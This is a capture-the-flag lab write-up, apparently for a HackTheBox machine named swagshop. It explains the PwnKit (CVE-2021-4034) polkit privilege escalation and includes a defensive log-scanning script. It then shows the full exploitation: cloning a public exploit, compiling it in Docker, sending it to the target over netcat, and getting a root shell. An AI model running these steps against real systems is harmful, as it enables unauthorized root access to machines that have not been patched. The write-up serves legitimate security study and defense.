CVE-2021-4034


PEAS has flagged the target system as vulnerable to CVE-2021-4034 (PwnKit).

The vulnerable program is part of Polkit, which manages process privileges. Polkit's pkexec is a setuid-root binary that lets non-privileged processes communicate with privileged ones and mediates legitimate, authorized uses of privilege escalation, similar to sudo.

A memory corruption flaw is triggered when pkexec is invoked with no arguments at all (an empty argv). By manipulating environment variables, an attacker can trick pkexec into loading and executing arbitrary code with superuser privileges.
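From the defender's side, this technique leaves traces: when pkexec's environment checks fail it writes one of two fixed messages to syslog (auth facility). The following script is an added example, not part of the original writeup; it scans constructed auth.log lines for those two pkexec messages and checks whether a pkexec binary still carries the setuid bit (dropping that bit is the known interim mitigation until polkit is patched). The log layout, hostname and PIDs in the sample are constructed; only the two indicator strings are pkexec's own wording.

```python
import os
import re
import stat

# Both strings are emitted by pkexec itself when its environment validation
# fails; the "suscipious" misspelling is in pkexec's source, so match it as-is.
PWNKIT_INDICATORS = (
    "The value for the SHELL variable was not found the /etc/shells file",
    "contains suscipious content",
)

# Assumed syslog layout: "<Mon DD HH:MM:SS> <host> pkexec[<pid>]: <message>"
SYSLOG_RE = re.compile(
    r"^(?P<ts>\S+ +\d+ [\d:]+) (?P<host>\S+) pkexec\[(?P<pid>\d+)\]: (?P<msg>.*)$"
)


def find_pwnkit_traces(lines):
    """Return (timestamp, host, pid, indicator) for every pkexec line that
    carries one of the PwnKit indicator messages; other lines are ignored."""
    hits = []
    for line in lines:
        m = SYSLOG_RE.match(line)
        if not m:
            continue
        for indicator in PWNKIT_INDICATORS:
            if indicator in m.group("msg"):
                hits.append((m.group("ts"), m.group("host"), int(m.group("pid")), indicator))
                break
    return hits


def pkexec_is_setuid(path="/usr/bin/pkexec"):
    """True if the binary exists and has the setuid bit set (the interim
    mitigation is to remove that bit, e.g. chmod 0755); False if it is absent."""
    try:
        return bool(os.stat(path).st_mode & stat.S_ISUID)
    except FileNotFoundError:
        return False


# Constructed sample auth.log excerpt (not captured from the target).
SAMPLE_AUTH_LOG = [
    "Jan 25 10:00:01 swagshop sshd[812]: Accepted publickey for deploy from 10.10.14.11 port 51022 ssh2",
    "Jan 25 10:02:13 swagshop pkexec[2391]: www-data: The value for the SHELL variable was not found the /etc/shells file [USER=root] [TTY=unknown] [CWD=/dev/shm] [COMMAND=]",
    "Jan 25 10:02:13 swagshop pkexec[2391]: www-data: The value for environment variable LANG contains suscipious content [USER=root] [TTY=unknown] [CWD=/dev/shm] [COMMAND=]",
    "Jan 25 10:05:40 swagshop CRON[2402]: pam_unix(cron:session): session opened for user root by (uid=0)",
]

if __name__ == "__main__":
    for ts, host, pid, indicator in find_pwnkit_traces(SAMPLE_AUTH_LOG):
        print(f"{ts} {host} pkexec[{pid}]: {indicator}")
    print("pkexec setuid bit present:", pkexec_is_setuid())
```

Run it against a real auth.log by feeding the file's lines to find_pwnkit_traces; a hit is a strong signal that an exploit was attempted, whether or not it succeeded.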

Exploit: PwnKit


I found an exploit online; I will download it to Kali.

www-data@swagshop:/$ gcc
The program 'gcc' is currently not installed. To run 'gcc' please ask your administrator to install the package 'gcc'

Since the target system doesn't have a compiler installed, I would have to compile the exploit remotely.

Docker Exploit Development


┌──(kali㉿kali)-[~/…/htb/labs/swagshop/kernelbuster]
└─$ docker run -it --entrypoint "/bin/bash" --name ubuntu_16.04 ubuntu:16.04

Starting an Ubuntu 16.04 shell in a Docker container, so the exploit is built against a glibc compatible with the target's.

root@519c3688ac4c:/# ldd --version
ldd (Ubuntu GLIBC 2.23-0ubuntu11.3) 2.23
Copyright (C) 2016 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.

Confirming the glibc version inside the container.

root@519c3688ac4c:/# apt update -y ; apt install net-tools netcat nano gcc gcc-multilib make git -y

Installing the necessary tools.

root@519c3688ac4c:~# git clone https://github.com/berdav/CVE-2021-4034.git ; cd CVE-2021-4034
Cloning into 'CVE-2021-4034'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 92 (delta 24), reused 19 (delta 19), pack-reused 56
unpacking objects: 100% (92/92), done.
Checking connectivity... done.

Cloning the exploit repository.

root@519c3688ac4c:~/CVE-2021-4034# make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true gconv_path=./pwnkit.so:.

Compiling the exploit with the bundled Makefile.

root@519c3688ac4c:~/CVE-2021-4034# cd .. ; tar -czf CVE-2021-4034.tar.gz CVE-2021-4034

Archiving the compiled exploit package for delivery.

root@519c3688ac4c:~# nc 10.10.10.140 2222 < CVE-2021-4034.tar.gz

www-data@swagshop:/dev/shm$ nc -nlvp 2222 > CVE-2021-4034.tar.gz
Listening on [0.0.0.0] (family 0, port 2222)
Connection from [10.10.14.11] port 2222 [tcp/*] accepted (family 2, sport 32832)

Delivery complete: the archive was sent over netcat from Kali to a listener on the target.

Exploitation


www-data@swagshop:/dev/shm$ tar -xf CVE-2021-4034.tar.gz ; cd CVE-2021-4034
www-data@swagshop:/dev/shm/CVE-2021-4034$ ./cve-2021-4034
# whoami
whoami
root
# hostname
hostname
swagshop
# ifconfig
ifconfig
ens160    Link encap:Ethernet  HWaddr 00:50:56:b9:49:f0  
          inet addr:10.10.10.140  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: dead:beef::250:56ff:feb9:49f0/64 Scope:Global
          inet6 addr: fe80::250:56ff:feb9:49f0/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:4859 errors:0 dropped:0 overruns:0 frame:0
          TX packets:4126 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:4346555 (4.3 MB)  TX bytes:1117942 (1.1 MB)
 
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:260 errors:0 dropped:0 overruns:0 frame:0
          TX packets:260 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:40176 (40.1 KB)  TX bytes:40176 (40.1 KB)

System Level Compromise